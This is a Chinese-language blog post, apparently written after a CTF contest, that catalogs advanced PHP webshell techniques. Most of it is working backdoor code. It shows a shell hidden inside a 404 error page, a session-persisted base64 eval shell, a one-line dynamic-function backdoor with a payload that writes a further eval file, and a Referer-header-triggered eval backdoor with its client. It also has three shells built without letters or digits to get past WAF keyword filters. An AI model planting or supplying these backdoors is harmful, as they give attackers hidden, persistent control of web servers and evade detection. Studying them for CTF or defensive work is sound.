Webshell的小艺术

最新推荐文章于 2023-06-09 15:54:12 发布
最新推荐文章于 2023-06-09 15:54:12 发布
阅读量550 收藏 1
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35078631/article/details/78635395
版权

做了一期湖湘杯,有一道专门利用webshell构造的题目,觉得还是挺受启发的,2333

前面专门总结过简单的常用的webshell,虽然不全但是很多比赛也是够用了,但是这里就是不行啦!
http://blog.csdn.net/qq_35078631/article/details/77743794

下面讲一下集中比较高级一些的webshell的制作方法,主要还是PHP的,其中包括一些小的思路、也包括一些独特的方法,当然很少是我自己的东西,主要还是整理一下

1.利用404页面隐藏PHP小马

这个不算是什么技术,只是一种思想,404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

2.无特征隐藏PHP一句话

<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

这个是摘录freebuf中的,至于为什么是无特征的也不太明白,可能是一直利用session隐藏了内容,达到了长时间驻留而不用每次都需要发送post包吧,算是流量的隐藏。

3.最灵活的PHP后门

<?php $_GET[a]($_GET[b]);?>

非常明显了,连函数都是自己输入的,可以做很多事情了。
利用方法:

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

这里注意的,其实对于$_GET[‘a’]是不可以用eval,它会报错显示未知命令eval,一定要用assert,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,或者如下利用

_=assert
&__=eval($_POST['pass'])
&pass=system('ls ../flag.php')

4.层级请求,编码运行PHP后门

也是参考了freebuf的文章,这里也算是一种思想吧,主要运用了两点
第一、运行的是一个编码过的字符串解码的内容,隐藏关键字
第二、构建层次关系,利用session或者其他的http头部的传送参数方式做到隐蔽传参或者是绕过传参
如下
1.php

<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
   eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}

2.php

<?php
//2.php
header('Content-type:text/html;charset=utf-8');
//要执行的代码
$code = <<<CODE
phpinfo();
CODE;
//进行base64编码
$code = base64_encode($code);
//构造referer字符串
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果,一般waf对referer这些检测要松一点,或者没有检测。

5.构造不带字母和数字的shell(方法一)

过滤程序

<?php
if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {
  eval($_GET['shell']);
}

这是这篇的重点开始,这里也是简单的一种方法,中心点在一下几点

1.利用$_等等可以构造变量
2.利用抑或等等运算可以构造目标名,

废话不多说,构造如下

<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[_]); // assert($_POST[_]);

6.构造不带字母和数字的shell(方法二)

第二种方法和第一种的思路大致相同,但是nb在哪儿呢,方法二使用的是位运算里的“取反”利用的是UTF-8编码的某个汉字,并将其中某个字符取出来,比如’和’{2}的结果是”\x8c”,其取反即为字母s,是不是被吓到啦!

这个方法容易报错,我就没试成,但是思路真的是厉害了

这里写图片描述 

<?php
$__=('>'>'<')+('>'>'<');
$_=$__/$__;

$____='';
$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});

$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});

$_=$$_____;
$____($_[$__]);

post内容

2=(输入内容)

试了大半夜总结出的比较使用的脚本

<?php
$__=('>'>'<')+('>'>'<');
$_=$__/$__;
$____='';
#$___="腊";$____.=~($___{$_});#O
#$___="毛";$____.=~($___{$_});#T
#$___="珊";$____.=~($___{$_});#E
#$___="站";$____.=~($___{$_});#A
#$___="朝";$____.=~($___{$_});#P
#$___="宅";$____.=~($___{$_});#S
#$___="愿";$____.=~($___{$_});#G
#$___="钩";$____.=~($___{$_});#L
#$___="讯";$____.=~($___{$_});#I
#$___="胤";$____.=~($___{$_});#H
#$___="雪";$____.=~($___{$_});#V
#$___="哀";$____.=~($___{$_});#X
#$___="铜";$____.=~($___{$_});#R
$___="站";$____.=~($___{$_});#A
$___="宅";$____.=~($___{$_});#S
$___="宅";$____.=~($___{$_});#S
$___="珊";$____.=~($___{$_});#E
$___="铜";$____.=~($___{$_});#R
$___="毛";$____.=~($___{$_});#T

$_____='';
$___="朝";$_____.=~($___{$_});#P
$___="腊";$_____.=~($___{$_});#O
$___="宅";$_____.=~($___{$_});#S
$___="毛";$_____.=~($___{$_});#T

$____(${'_'.$_____}[_]);

post内容如下

这里写图片描述

7.构造不带字母和数字的shell(方法三)

最最严格的过滤!我们看一个题目

<?php 
ini_set("display_errors", "On"); 
error_reporting(E_ALL | E_STRICT); 
if(!isset($_GET['content'])){ 
   show_source(__FILE__); 
   die(); 
} 
function rand_string( $length ) { 
   $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";     
   $size = strlen( $chars ); 
   $str = ''; 
   for( $i = 0; $i < $length; $i++) { 
       $str .= $chars[ rand( 0, $size - 1 ) ]; 
   } 
   return $str; 
} 
$data = $_GET['content']; 
$black_char = array('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',' ', '!', '"', '#', '%', '&', '*', ',', '-', '/', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', '<', '>', '?', '@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '\\', '^', '`',  '|', '~');
foreach ($black_char as $b) { 
   if (stripos($data, $b) !== false){ 
       die("关键字WAF"); 
   } 
} 
$filename=rand_string(0x20).'.php'; 
$folder='uploads/'; 
$full_filename = $folder.$filename; 
if(file_put_contents($full_filename, '<?php '.$data)){ 
   echo "<a href='".$full_filename."'>shell</a></br>"; 
   echo "我的/flag,你读到了么"; 
}else{ 
   echo "噢 噢,错了"; 
}

厉害了,这下没过滤的很少的,重点是存在如下符号可以养

= $ _ + ' ( ) [ ] { }等等

我们列举几个重要的点!我们重点关注一下3号!

1.A可以用++进行计算,A++之后就是B
2.字符++后变成了0,如''+0=0(int)
3.''.[]之后报错返回的信息是Array,取0号位可以得到A,结合第一点可以构造POST了。加上[]{}.没有过滤即可构造

利用代码如下

<?php
$_=''.[];
$__='';
$__=$_++;
$_=$_[$__];
$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;
$___=$_;
$_++;
$__=$_;
$_++;$_++;$_++;
$____=$_;
$_++;
${'_'.$__.$___.$____.$_}['_'](${'_'.$__.$___.$____.$_}['__']);#$_POST['_']($POST['__']);
?>

构造如下

这里写图片描述

Assassin__is__me
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web新手区题目 webshell
Sk1y的博客
10-03 482
web新手区题目webshell 题目 打开后显示如下 分析一下: 有一个名为shell的变量,其取值为post方式; eval()函数,简单来讲其作用是将()内的字符串作为脚本语言来执行,详细讲解请看这位大佬博文:https://blog.csdn.net/NinoYeves/article/details/73380553; @作用,将php语句表达式可能生成的错误信息忽略掉; 连起来看,这就是个php一句话木马。 解决方法: 方法一: 菜刀如图,将url填入,密码就是shell,类型是php,点
XCTF_Web_新手练习区:webshell
1stPeak's Blog
06-13 687
第十题:webshell 目标: 看懂一句话木马 学会使用菜刀/蚁剑 菜刀下载链接:https://github.com/1stPeak/Caidao 蚁剑下载链接:https://github.com/AntSwordProject/antSword/releases Writeup (1)打开目标网址,出现如下所示: (2)哎呦,我们先分析一波,没有上传点,莫非?它已经将上图中的一...
网络安全CTF夺旗赛入门到入狱-入门介绍篇
喜欢Python编程的程序员柚柚呀
06-09 8229
网络安全CTF夺旗赛入门到入狱-入门介绍篇
CTF夺旗赛培训——基本知识
为什么我是菜鸟
12-04 2万+
胡斌强的博客:https://hubinqiang.com 什么是信息安全 在网络出现以前,信息安全指相对信息的机密性、完整性和可控性的保护面向数据的安全。 互联网出现以后,信息安全除了上述概念以外,其内涵扩展到面向用户的安全——鉴别、授权、访问控制、抗否认性和可服务性以及内容的个人隐私、只是产权等的保护。
Webshell安全检测篇
weixin_34199405的博客
03-08 1060
守望者实验室 · 2015/11/29 15:090x00 基于流量的检测方式1.概述笔者一直在关注webshell的安全分析,最近就这段时间的心得体会和大家做个分享。webshell一般有三种检测方式:基于流量模式基于agent模式(实质是直接分析webshell文件)基于日志分析模式Webshell的分类笔者总结如下:前段时间由于工作的需要完成了一个Webshell检测系统,根据当时的需求写了...
【服务器防护】WEB防护 - WEBSHELL攻击探测【转载】
diaozhe1882的博客
05-02 1316
1.概述 笔者一直在关注webshell的安全分析,最近就这段时间的心得体会和大家做个分享。 webshell一般有三种检测方式: 基于流量模式基于agent模式(实质是直接分析webshell文件)基于日志分析模式 Webshell的分类笔者总结如下: 前段时间由于工作的需要完成了一个Webshell检测系统,根据当时的需求写了一篇关于使用基于Agent模型和基于日志分析...
webshell反弹技术
01-05
webshell反弹技术
webshell检测样例
12-20
webshell检测样例
网站后台拿Webshell
01-13
webshell的作用是方便攻击者,webshell是拥有fso权限,根据fso权限的不用,可以对网页进行编辑删除,上传或者下载,查看文件 攻击者也可以通过这个webshell对服务器进行提权,提权成功后,会得到服务器管理权限。拿...
Webshell后门查杀
12-20
Webshell后门查杀是网络安全领域中的一个重要环节,主要针对的是网站系统被恶意攻击者植入的WebshellWebshell是一种通过Web服务器漏洞植入的特殊脚本,它允许攻击者通过Web接口对目标服务器进行远程控制,执行任意...
webshell数据分析环境
10-08
在IT安全领域,Webshell是一种常见的黑客工具,用于在目标服务器上获得持久的远程控制。一旦Webshell被植入,攻击者可以通过它执行任意命令、上传或下载文件,甚至控制系统。本话题聚焦于“webshell数据分析环境”,...
CTF-练习平台 Web writeup By Assassin [暂时完结]
热门推荐
Assassin
04-06 6万+
签到题 web2 文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"计算题改一下浏览器中的text的长度Web3进去一直弹框,没完没了…直接禁用了F12看源码,发现有一个<!--KEY&#
i春秋 百度杯”CTF比赛(二月场) Misc&&web题解 By Assassin
Assassin
03-16 2万+
学习web,搞起来! 百度杯”CTF比赛(二月场)训练赛传送门爆破-1打开题目我们直接就看到源码,加上注释如下<?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值 if(!preg_match('/^\w*$/',$a )){ //正则
Wechall writeup By Assassin
Assassin
08-25 1万+
不得不说wechall的题目还是挺有趣的,外国的题目感觉和国内的题目不太一样,真是学习学习了,wp持续跟新Prime Factory #_*_ coding:utf-8 _*_ import math def is_prime(num): for i in range(2,int(math.sqrt(num))+1): if num%i==0: ret
prompt(1) to win -----XSS学习笔记
Assassin
08-13 1万+
一直不是很懂XSS,所以这里专门来学习一下下!记录做题的过程嗯。规则是当想办法嵌入prompt(1) 就算胜利了第0关什么过滤都没有,payload如下"><script>prompt(1)</script><"第1关—<> 过滤function escape(input) { // tags stripping mechanism from ExtJS library // Ext
用MD5实现hash长度扩展攻击 By Assassin
Assassin
04-28 1万+
今天心血来潮,看到了扩展攻击,猛然想到了之前看的扩展攻击的原理还没有弄懂,这里补充一下,hash长度扩展攻击到底是怎么实现的。题目首先从实验吧上面见到的经典的题目,下面给出源码<?php $flag = "flag{flag is here}"; $secret = "aaaaabbbbbccccc"; // This secret is 15 characters long for securit
Seacms漏洞分析利用复现 By Assassin
Assassin
08-03 9749
碰到了cms,之前一直没有真正的分析过,趁着没事干准备复现一个seacms的漏洞复现,但是经过一系列的苦痛挣扎发现—–搭个环境神特么难…一开始我想用ubuntu直接搭建,但是我用的是php7,而各大seacms的安装指南上说…===必读提示=== ------------------------------------- 【1】自适应模板不支持IE6/7/8古董浏览器,会发生错误。国内双核浏览器的兼
webshell原理
最新发布
06-14
Webshell是一种恶意软件,通常被黑客用于远程控制Web服务器上的系统。它通过在服务器上植入一个脚本或程序,允许攻击者像操作本地计算机一样执行命令。Webshell的工作原理主要包括以下几个步骤: 1. **植入阶段**:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值